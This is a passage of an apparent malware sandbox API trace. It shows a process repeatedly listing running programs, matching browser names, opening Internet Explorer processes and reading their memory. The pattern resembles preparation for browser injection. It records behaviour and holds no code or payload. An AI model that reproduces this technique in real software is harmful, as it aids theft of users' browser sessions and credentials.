	[0222.215] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0222.216] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x534c
	[0222.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.216] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0222.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.216] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.217] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0222.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.217] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.217] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0222.218] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5350
	[0222.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.218] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0222.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.218] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.219] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0222.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.219] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.220] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0222.220] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5354
	[0222.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.221] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0222.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.221] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.222] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0222.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.222] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.223] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0222.224] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5358
	[0222.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.224] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0222.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.225] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.225] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0222.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.226] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.226] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0222.227] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x535c
	[0222.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.227] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0222.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.228] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.228] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0222.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.229] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.230] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0222.230] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5360
	[0222.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.230] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0222.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.231] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.231] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0222.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.232] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.232] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0222.233] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5364
	[0222.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.233] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0222.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.233] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0222.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.233] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0222.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.234] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.234] NtQueryInformationProcess (in: ProcessHandle=0x5364, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0222.234] ReadProcessMemory (in: hProcess=0x5364, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0222.234] ReadProcessMemory (in: hProcess=0x5364, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0222.234] ReadProcessMemory (in: hProcess=0x5364, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0222.234] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0222.235] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0222.235] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5368
	[0222.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.235] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0222.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.236] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0222.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.236] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0222.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.236] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.236] NtQueryInformationProcess (in: ProcessHandle=0x5368, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0222.237] ReadProcessMemory (in: hProcess=0x5368, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0222.237] ReadProcessMemory (in: hProcess=0x5368, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0222.237] ReadProcessMemory (in: hProcess=0x5368, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0222.237] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0222.237] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0222.238] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x536c
	[0222.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.238] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0222.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.238] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.239] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0222.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.239] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.239] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0222.240] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x5370
	[0222.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.240] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0222.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.240] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.241] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0222.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.241] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.241] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.242] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5374
	[0222.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.242] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.243] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.243] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.243] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.243] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.244] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.245] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5378
	[0222.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.245] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.245] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.246] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.246] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.246] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.247] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x537c
	[0222.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.247] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.247] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.248] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.248] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.248] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0222.249] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x5380
	[0222.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.249] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0222.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.249] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.250] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0222.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.250] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.250] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0222.251] CloseHandle (hObject=0x4fd0) returned 1
	[0222.251] Sleep (dwMilliseconds=0x64) 
	[0222.349] GetCurrentProcessId () returned 0x110
	[0222.349] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0222.355] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0222.357] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0222.359] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0222.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5384
	[0222.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.361] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0222.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.361] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.362] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0222.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.362] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.362] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0222.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5388
	[0222.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.363] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0222.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.364] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.364] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0222.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.364] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.364] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0222.365] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x538c
	[0222.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.365] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0222.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.365] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.366] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0222.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.366] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.366] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0222.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x5390
	[0222.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.367] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0222.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.368] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.368] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0222.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.368] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.368] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0222.369] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x5394
	[0222.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.369] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0222.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.369] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.370] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0222.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.370] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.370] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0222.371] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5398
	[0222.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.371] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0222.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.372] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.372] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0222.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.372] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.372] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0222.373] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x539c
	[0222.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.373] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0222.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.374] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.374] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0222.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.374] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.374] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0222.375] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x53a0
	[0222.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
